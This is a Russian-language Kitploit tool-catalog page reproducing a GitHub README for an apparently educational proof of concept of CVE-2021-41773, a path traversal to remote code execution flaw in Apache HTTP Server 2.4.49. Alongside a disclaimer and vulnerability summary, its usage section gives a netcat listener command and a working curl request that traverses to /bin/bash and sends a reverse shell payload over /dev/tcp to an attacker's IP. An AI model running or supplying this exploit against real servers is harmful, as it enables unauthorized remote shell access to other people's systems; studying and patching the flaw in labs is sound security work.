Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-41773-Apache_2.4.49-Path-traversal-to-RCE — Учебный proof-of-concept для CVE-2021-41773, демонстрирующий path traversal до remote code execution на Apache HTTP Server 2.4.49 с reverse shell payload. | Kitploit
Инструменты/GitHubGitHub/cyberquestor-infosec/cve-2021-41773-apache_2.4.49-path-traversal-to-rce
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubcyberquestor-infosec/cve-2021-41773-apache_2.4.49-path-traversal-to-rce

CVE-2021-41773-Apache_2.4.49-Path-traversal-to-RCE

Учебный proof-of-concept для CVE-2021-41773, демонстрирующий path traversal до remote code execution на Apache HTTP Server 2.4.49 с reverse shell payload.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
21 год назадЕщё не проверено

CVE-2021-41773 – Apache HTTP Server 2.4.49 Удаленное выполнение кода

⚠️ Отказ от ответственности
Этот репозиторий предназначен строго для образовательных и исследовательских целей.
Предоставленная информация и код могут использоваться в контролируемых средах, таких как частные лабораторные машины.
Несанкционированное использование этого кода против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения, является незаконным и неэтичным.
Автор не несет ответственности за любое неправомерное использование или причиненный ущерб.


🔍 О уязвимости

CVE-2021-41773 затрагивает Apache HTTP Server версии 2.4.49.
Из-за неправильной проверки ввода при нормализации путей злоумышленник может использовать обход пути с помощью закодированных символов, таких как %2e, для доступа к произвольным файлам.
Если CGI включен, эта уязвимость может быть повышена до неаутентифицированного удаленного выполнения кода (RCE).

  • Тип уязвимости: Обход пути до удаленного выполнения кода
  • Затрагиваемая версия: Apache 2.4.49
  • Требуется аутентификация: ❌ Нет
  • Серьезность: Критический
  • Оценка CVSS: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

🧾 Ссылки

  • Рекомендации по безопасности Apache
  • Exploit-DB – 50383
  • GitHub PoC
  • Отчет NVD по CVE

🛠 Обзор эксплойта

Формируется вредоносный запрос curl для использования недостатка обхода пути. Если CGI включен, атакующие могут получить доступ к /bin/bash и выполнять произвольные команды оболочки.
В этом примере отправляется полезная нагрузка обратной оболочки для получения доступа к оболочке с сервера.


💥 Демонстрация

Этот эксплойт был протестирован в частной лабораторной среде. Ниже приведены шаги и результаты.

1. Обнаружение версии Apache

Сканирование Nmap выявило цель, работающую под Apache/2.4.49.

Версия Apache


2. Выполнение эксплойта

Полезная нагрузка обратной оболочки была доставлена с помощью сформированной команды curl.

Выполнение эксплойта


3. Получена обратная оболочка

Обратная оболочка была успешно получена на слушателе атакующего.

Обратная оболочка


📂 Использование эксплойта

Шаг 1: Запустите слушатель Netcat

root@kitploit:~
nc -nvlp 4444

Шаг 2: Запустите эксплойт

root@kitploit:~
curl -v 'http://<цель>:<порт>/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash' -d 'echo Content-Type: text/plain; echo; bash -i >& /dev/tcp/<ваш-ip>/4444 0>&1' -H 'Content-Type: text/plain'

✔️ Убедитесь:

  • Версия Apache 2.4.49
  • CGI включен
  • Порт 4444 (или выбранный вами порт) открыт через брандмауэр

📖 Блог на Medium

Ознакомьтесь с подробным руководством и теорией в моей статье на Medium:
👉 Читать блог на Medium

Скачать инструмент